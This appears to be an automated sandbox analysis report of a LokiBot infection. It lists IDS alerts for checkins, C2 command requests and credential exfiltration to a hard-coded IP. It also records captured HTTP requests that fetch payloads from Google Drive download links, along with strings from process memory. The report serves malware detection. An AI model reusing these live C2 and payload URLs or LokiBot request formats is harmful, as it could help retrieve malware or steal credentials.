                Source: Network traffic, Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49725 -> 137.184.191.215:80
                Source: Network traffic, Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49740 -> 137.184.191.215:80
                Source: Network traffic, Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49736 -> 137.184.191.215:80
                Source: Network traffic, Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49740 -> 137.184.191.215:80
                Source: Network traffic, Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49736 -> 137.184.191.215:80
                Source: Network traffic, Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49744 -> 137.184.191.215:80
                Source: Network traffic, Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49744 -> 137.184.191.215:80
                Source: Network traffic, Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49744 -> 137.184.191.215:80
                Source: Network traffic, Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49740 -> 137.184.191.215:80
                Source: Network traffic, Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49736 -> 137.184.191.215:80
                Source: Network traffic, Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49745 -> 137.184.191.215:80
                Source: Network traffic, Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49745 -> 137.184.191.215:80
                Source: Network traffic, Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49717 -> 137.184.191.215:80
                Source: Network traffic, Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49733 -> 137.184.191.215:80
                Source: Network traffic, Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49725 -> 137.184.191.215:80
                Source: Network traffic, Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49731 -> 137.184.191.215:80
                Source: Network traffic, Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49732 -> 137.184.191.215:80
                Source: Network traffic, Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49728 -> 137.184.191.215:80
                Source: Network traffic, Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49723 -> 137.184.191.215:80
                Source: Network traffic, Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49718 -> 137.184.191.215:80
                Source: Network traffic, Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49721 -> 137.184.191.215:80
                Source: Network traffic, Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49721 -> 137.184.191.215:80
                Source: Network traffic, Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49728 -> 137.184.191.215:80
                Source: Network traffic, Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49721 -> 137.184.191.215:80
                Source: Network traffic, Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49716 -> 137.184.191.215:80
                Source: Network traffic, Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49715 -> 137.184.191.215:80
                Source: Network traffic, Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49715 -> 137.184.191.215:80
                Source: Network traffic, Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49727 -> 137.184.191.215:80
                Source: Network traffic, Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49727 -> 137.184.191.215:80
                Source: Network traffic, Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49742 -> 137.184.191.215:80
                Source: Network traffic, Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49742 -> 137.184.191.215:80
                Source: Network traffic, Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49724 -> 137.184.191.215:80
                Source: Network traffic, Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49724 -> 137.184.191.215:80
                Source: Network traffic, Suricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.5:49715 -> 137.184.191.215:80
                Source: Network traffic, Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49732 -> 137.184.191.215:80
                Source: Network traffic, Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49737 -> 137.184.191.215:80
                Source: Network traffic, Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49737 -> 137.184.191.215:80
                Source: Network traffic, Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49742 -> 137.184.191.215:80
                Source: Network traffic, Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49717 -> 137.184.191.215:80
                Source: Network traffic, Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49727 -> 137.184.191.215:80
                Source: Network traffic, Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49718 -> 137.184.191.215:80
                Source: Network traffic, Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49717 -> 137.184.191.215:80
                Source: Network traffic, Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49718 -> 137.184.191.215:80
                Source: Network traffic, Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49734 -> 137.184.191.215:80
                Source: Network traffic, Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49737 -> 137.184.191.215:80
                Source: Network traffic, Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49745 -> 137.184.191.215:80
                Source: Network traffic, Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49724 -> 137.184.191.215:80
                Source: Network traffic, Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49733 -> 137.184.191.215:80
                Source: Network traffic, Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49716 -> 137.184.191.215:80
                Source: Network traffic, Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49719 -> 137.184.191.215:80
                Source: Network traffic, Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49719 -> 137.184.191.215:80
                Source: Network traffic, Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49734 -> 137.184.191.215:80
                Source: Network traffic, Suricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.5:49716 -> 137.184.191.215:80
                Source: Network traffic, Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49719 -> 137.184.191.215:80
                Source: Network traffic, Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49733 -> 137.184.191.215:80
                Source: Network traffic, Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49726 -> 137.184.191.215:80
                Source: Network traffic, Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49726 -> 137.184.191.215:80
                Source: Network traffic, Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49732 -> 137.184.191.215:80
                Source: Network traffic, Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49734 -> 137.184.191.215:80
                Source: Network traffic, Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49722 -> 137.184.191.215:80
                Source: Network traffic, Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49722 -> 137.184.191.215:80
                Source: Network traffic, Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49726 -> 137.184.191.215:80
                Source: Network traffic, Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49722 -> 137.184.191.215:80
                Source: Network traffic, Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49729 -> 137.184.191.215:80
                Source: Network traffic, Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49729 -> 137.184.191.215:80
                Source: Network traffic, Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49730 -> 137.184.191.215:80
                Source: Network traffic, Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49730 -> 137.184.191.215:80
                Source: Network traffic, Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49729 -> 137.184.191.215:80
                Source: Network traffic, Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49739 -> 137.184.191.215:80
                Source: Network traffic, Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49730 -> 137.184.191.215:80
                Source: Network traffic, Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49739 -> 137.184.191.215:80
                Source: Network traffic, Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49739 -> 137.184.191.215:80
                Source: Network traffic, Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49735 -> 137.184.191.215:80
                Source: Network traffic, Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49741 -> 137.184.191.215:80
                Source: Network traffic, Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49735 -> 137.184.191.215:80
                Source: Network traffic, Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49741 -> 137.184.191.215:80
                Source: Network traffic, Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49735 -> 137.184.191.215:80
                Source: Network traffic, Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49741 -> 137.184.191.215:80
                Source: Network traffic, Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49743 -> 137.184.191.215:80
                Source: Network traffic, Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49743 -> 137.184.191.215:80
                Source: Network traffic, Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49743 -> 137.184.191.215:80
                Source: Network traffic, Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49738 -> 137.184.191.215:80
                Source: Network traffic, Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49738 -> 137.184.191.215:80
                Source: Network traffic, Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49738 -> 137.184.191.215:80
                Source: Joe Sandbox View, IP Address: 137.184.191.215
                Source: Joe Sandbox View, ASN Name: PANDGUS
                Source: Joe Sandbox View, JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                Source: Joe Sandbox View, JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                Source: Network traffic, Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.5:49713 -> 142.250.184.238:443
                Source: global traffic, HTTP traffic detected: GET /uc?export=download&id=1exFxLo5Dn87FWQsKOF9GF6Rf-pHgXqJ8 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 | Host: drive.google.com | Connection: Keep-Alive
                Source: global traffic, HTTP traffic detected: GET /download?id=1exFxLo5Dn87FWQsKOF9GF6Rf-pHgXqJ8&export=download HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 | Host: drive.usercontent.google.com | Connection: Keep-Alive
                Source: global traffic, HTTP traffic detected: GET /uc?export=download&id=1X9VWjBBE8e_2wKjkMjTUVDuC1CN1AV1I HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 | Host: drive.google.com | Cache-Control: no-cache
                Source: global traffic, HTTP traffic detected: GET /download?id=1X9VWjBBE8e_2wKjkMjTUVDuC1CN1AV1I&export=download HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 | Cache-Control: no-cache | Host: drive.usercontent.google.com | Connection: Keep-Alive
                Source: global traffic, HTTP traffic detected: POST /index.php/check.php?id=1 HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 137.184.191.215 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: C7D7BA0 | Content-Length: 180 | Connection: close
                Source: global traffic, HTTP traffic detected: POST /index.php/check.php?id=1 HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 137.184.191.215 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: C7D7BA0 | Content-Length: 153 | Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/check.php?id=1 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C7D7BA0Content-Length: 153Connection: close
                Source: unknown TCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1exFxLo5Dn87FWQsKOF9GF6Rf-pHgXqJ8 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: drive.google.com Connection: Keep-Alive
                Source: global traffic HTTP traffic detected: GET /download?id=1exFxLo5Dn87FWQsKOF9GF6Rf-pHgXqJ8&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: drive.usercontent.google.com Connection: Keep-Alive
                Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1X9VWjBBE8e_2wKjkMjTUVDuC1CN1AV1I HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: drive.google.com Cache-Control: no-cache
                Source: global traffic HTTP traffic detected: GET /download?id=1X9VWjBBE8e_2wKjkMjTUVDuC1CN1AV1I&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive
                Source: global traffic DNS traffic detected: DNS query: drive.google.com
                Source: global traffic DNS traffic detected: DNS query: drive.usercontent.google.com
                Source: unknown HTTP traffic detected: POST /index.php/check.php?id=1 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 137.184.191.215 Accept: */* Content-Type: application/octet-stream Content-Encoding: binary Content-Key: C7D7BA0 Content-Length: 180 Connection: close
                Source: dxdiag.exe, dxdiag.exe, 00000012.00000003.2523458523.0000000005F63000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000012.00000002.3285682620.0000000005F63000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://137.184.191.215/index.php/check.php?id=1
                Source: powershell.exe, 00000002.00000002.2211216350.000002B428DF3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://drive.google.com
                Source: powershell.exe, 00000002.00000002.2211216350.000002B428E2D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://drive.usercontent.google.com
                Source: powershell.exe, 00000002.00000002.2241948302.000002B4370DF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.3026899970.0000000005BB6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
                Source: powershell.exe, 00000004.00000002.3013276125.0000000004CA8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
                Source: powershell.exe, 00000002.00000002.2211216350.000002B427071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.3013276125.0000000004B51000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: powershell.exe, 00000004.00000002.3013276125.0000000004CA8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                Source: powershell.exe, 00000002.00000002.2211216350.000002B427071000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
                Source: powershell.exe, 00000004.00000002.3013276125.0000000004B51000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore6lBsq
                Source: powershell.exe, 00000002.00000002.2211216350.000002B428E1A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2211216350.000002B427501000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2211216350.000002B428DF3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2211216350.000002B428E16000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000012.00000003.2422518928.0000000005F67000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://apis.google.com
                Source: powershell.exe, 00000004.00000002.3026899970.0000000005BB6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
                Source: powershell.exe, 00000004.00000002.3026899970.0000000005BB6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
                Source: powershell.exe, 00000004.00000002.3026899970.0000000005BB6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
                Source: powershell.exe, 00000002.00000002.2211216350.000002B428D44000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.googP
                Source: powershell.exe, 00000002.00000002.2211216350.000002B427297000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2211216350.000002B428D44000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com
                Source: dxdiag.exe, 00000012.00000002.3285682620.0000000005EF8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/
                Source: dxdiag.exe, 00000012.00000002.3285682620.0000000005EF8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/-
                Source: dxdiag.exe, 00000012.00000002.3285682620.0000000005EF8000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000012.00000002.3286061335.0000000006180000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1X9VWjBBE8e_2wKjkMjTUVDuC1CN1AV1I
                Source: powershell.exe, 00000002.00000002.2211216350.000002B427297000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1exFxLo5Dn87FWQsKOF9GF6Rf-pHgXqJ8P
                Source: powershell.exe, 00000004.00000002.3013276125.0000000004CA8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1exFxLo5Dn87FWQsKOF9GF6Rf-pHgXqJ8XR
                Source: powershell.exe, 00000002.00000002.2211216350.000002B428E1A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.googh8
                Source: powershell.exe, 00000002.00000002.2211216350.000002B428E1A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2211216350.000002B427505000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.google.com
                Source: dxdiag.exe, dxdiag.exe, 00000012.00000003.2523490234.0000000005F9D000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000012.00000003.2459489628.0000000005F9D000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000012.00000003.2459437875.0000000005F63000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000012.00000003.2523458523.0000000005F63000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000012.00000002.3285682620.0000000005F63000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000012.00000002.3285682620.0000000005F36000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.google.com/
                Source: dxdiag.exe, 00000012.00000003.2422518928.0000000005F67000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000012.00000002.3285682620.0000000005EF8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.google.com/download?id=1X9VWjBBE8e_2wKjkMjTUVDuC1CN1AV1I&export=download
                Source: dxdiag.exe, 00000012.00000002.3285682620.0000000005EF8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.google.com/download?id=1X9VWjBBE8e_2wKjkMjTUVDuC1CN1AV1I&export=downloadM
                Source: powershell.exe, 00000002.00000002.2211216350.000002B428E1A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2211216350.000002B427505000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.google.com/download?id=1exFxLo5Dn87FWQsKOF9GF6Rf-pHgXqJ8&export=download
                Source: powershell.exe, 00000004.00000002.3013276125.0000000004CA8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
                Source: powershell.exe, 00000002.00000002.2211216350.000002B427C51000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://go.micro
                Source: powershell.exe, 00000002.00000002.2241948302.000002B4370DF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.3026899970.0000000005BB6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
                Source: powershell.exe, 00000002.00000002.2211216350.000002B428E1A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2211216350.000002B427501000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2211216350.000002B428DF3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2211216350.000002B428E16000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000012.00000003.2422518928.0000000005F67000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ssl.gstatic.com
                Source: dxdiag.exe, 00000012.00000002.3285682620.0000000005F36000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://wordpress.org/documentation/article/faq-troubleshooting/
                Source: powershell.exe, 00000002.00000002.2211216350.000002B428E1A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2211216350.000002B427501000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2211216350.000002B428DF3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2211216350.000002B428E16000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000012.00000003.2422518928.0000000005F67000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google-analytics.com;report-uri
                Source: powershell.exe, 00000002.00000002.2211216350.000002B428E1A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2211216350.000002B427501000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2211216350.000002B428DF3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2211216350.000002B428E16000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000012.00000003.2422518928.0000000005F67000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com
                Source: powershell.exe, 00000002.00000002.2211216350.000002B428E1A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2211216350.000002B427501000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2211216350.000002B428DF3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2211216350.000002B428E16000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000012.00000003.2422518928.0000000005F67000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.googletagmanager.com
                Source: powershell.exe, 00000002.00000002.2211216350.000002B428E1A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2211216350.000002B427501000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2211216350.000002B428DF3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2211216350.000002B428E16000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000012.00000003.2422518928.0000000005F67000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com
                Source: unknown Network traffic detected: HTTP traffic on port 49705 -> 443
                Source: unknown Network traffic detected: HTTP traffic on port 49704 -> 443
                Source: unknown Network traffic detected: HTTP traffic on port 49713 -> 443
                Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49705
                Source: unknown Network traffic detected: HTTP traffic on port 49714 -> 443
                Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49704
                Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49714
                Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49713
                Source: unknown HTTPS traffic detected: 142.250.184.238:443 -> 192.168.2.5:49704 version: TLS 1.2
                Source: unknown HTTPS traffic detected: 142.250.184.193:443 -> 192.168.2.5:49705 version: TLS 1.2
                Source: unknown HTTPS traffic detected: 142.250.184.238:443 -> 192.168.2.5:49713 version: TLS 1.2
                Source: unknown HTTPS traffic detected: 142.250.184.193:443 -> 192.168.2.5:49714 version: TLS 1.2

                System Summary

                Source: amsi32_6412.amsi.csv, type: OTHER Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: Process Memory Space: powershell.exe PID: 3032, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: Process Memory Space: powershell.exe PID: 6412, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
